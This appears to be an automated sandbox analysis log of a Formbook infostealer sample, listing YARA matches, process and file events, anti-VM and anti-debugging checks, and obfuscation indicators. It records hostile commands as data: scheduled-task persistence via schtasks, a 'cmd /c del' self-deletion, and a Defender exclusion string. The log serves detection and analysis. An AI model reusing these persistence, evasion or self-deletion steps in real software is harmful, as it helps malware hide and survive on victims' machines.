Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 08917506_by_Libranalysis.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: OfCxSfBf.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/4@14/9
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A4D12 AdjustTokenPrivileges, 0_2_058A4D12
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A4CDB AdjustTokenPrivileges, 0_2_058A4CDB
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File created: C:\Users\user\AppData\Roaming\OfCxSfBf.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:360:120:WilError_01
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_01
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Mutant created: \Sessions\1\BaseNamedObjects\VcUWFLvHOIJOkLh
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File created: C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp Jump to behavior
Source: 08917506_by_Libranalysis.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: 08917506_by_Libranalysis.exe Virustotal: Detection: 23%
Source: 08917506_by_Libranalysis.exe ReversingLabs: Detection: 17%
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File read: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\08917506_by_Libranalysis.exe 'C:\Users\user\Desktop\08917506_by_Libranalysis.exe'
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process created: C:\Users\user\Desktop\08917506_by_Libranalysis.exe C:\Users\user\Desktop\08917506_by_Libranalysis.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\08917506_by_Libranalysis.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp' Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process created: C:\Users\user\Desktop\08917506_by_Libranalysis.exe C:\Users\user\Desktop\08917506_by_Libranalysis.exe Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\08917506_by_Libranalysis.exe' Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll Jump to behavior
Source: 08917506_by_Libranalysis.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll Jump to behavior
Source: 08917506_by_Libranalysis.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb source: 08917506_by_Libranalysis.exe, 00000005.00000002.295591762.0000000003150000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL source: 08917506_by_Libranalysis.exe, 00000005.00000002.295591762.0000000003150000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: 08917506_by_Libranalysis.exe, 00000005.00000002.295139182.0000000001550000.00000040.00000001.sdmp, ipconfig.exe, 0000000F.00000002.495544603.0000000000D30000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: 08917506_by_Libranalysis.exe, ipconfig.exe
Source: Binary string: mscorrc.pdb source: 08917506_by_Libranalysis.exe, 00000000.00000002.260684849.0000000009280000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_00FCB0BE push es; retf 0_2_00FCB4A3
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_00FCA8BA push es; retf 0_2_00FCB4A3
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_0311925D push ebx; retf 0_2_0311925E
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_03119260 push ebx; retf 0_2_03119262
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_03118709 push ebx; retf 0_2_0311870A
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_031177B0 push ebx; retf 0_2_031177B2
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_031177AD push ebx; retf 0_2_031177AE
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_03119C5D push ebx; retf 0_2_03119C5E
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_03119C60 push ebx; retf 0_2_03119C62
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041C97B push esp; ret 5_2_0041C97C
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041528B push ecx; retf 5_2_0041528D
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004152B6 push eax; retf 5_2_004152B7
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041B3F2 push eax; ret 5_2_0041B3F8
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041B3FB push eax; ret 5_2_0041B462
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041B3A5 push eax; ret 5_2_0041B3F8
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_0041B45C push eax; ret 5_2_0041B462
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00B2B0BE push es; retf 5_2_00B2B4A3
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_00B2A8D8 push es; retf 5_2_00B2B4A3
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_015CD0D1 push ecx; ret 5_2_015CD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DAD0D1 push ecx; ret 15_2_00DAD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CB8D0 push ebp; ret 15_2_003CB8D1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CC97B push esp; ret 15_2_003CC97C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C52B6 push eax; retf 15_2_003C52B7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003C528B push ecx; retf 15_2_003C528D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CB3A5 push eax; ret 15_2_003CB3F8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CB3FB push eax; ret 15_2_003CB462
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CB3F2 push eax; ret 15_2_003CB3F8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CB45C push eax; ret 15_2_003CB462
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_003CBDD0 push cs; ret 15_2_003CBDD1
Source: initial sample Static PE information: section name: .text entropy: 7.64331504129
Source: initial sample Static PE information: section name: .text entropy: 7.64331504129

Persistence and Installation Behavior:

barindex
Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Drops PE files
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File created: C:\Users\user\AppData\Roaming\OfCxSfBf.exe Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp'

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 08917506_by_Libranalysis.exe PID: 1144, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 00000000003B85E4 second address: 00000000003B85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 00000000003B896E second address: 00000000003B8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004088A0 rdtsc 5_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe TID: 5612 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe TID: 5640 Thread sleep time: -99936s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe TID: 5868 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5708 Thread sleep time: -55000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 7140 Thread sleep time: -42000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Thread delayed: delay time: 99936 Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000007.00000000.277409479.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000007.00000000.277409479.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258654930.0000000008C00000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.270380927.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000007.00000000.277858693.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000007.00000000.277858693.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000007.00000000.267436007.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000007.00000000.277780603.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000007.00000000.277858693.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000007.00000000.277780603.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000007.00000000.273537437.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258654930.0000000008C00000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.270380927.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258654930.0000000008C00000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.270380927.00000000059C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258654930.0000000008C00000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.270380927.00000000059C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 5_2_004088A0 rdtsc 5_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
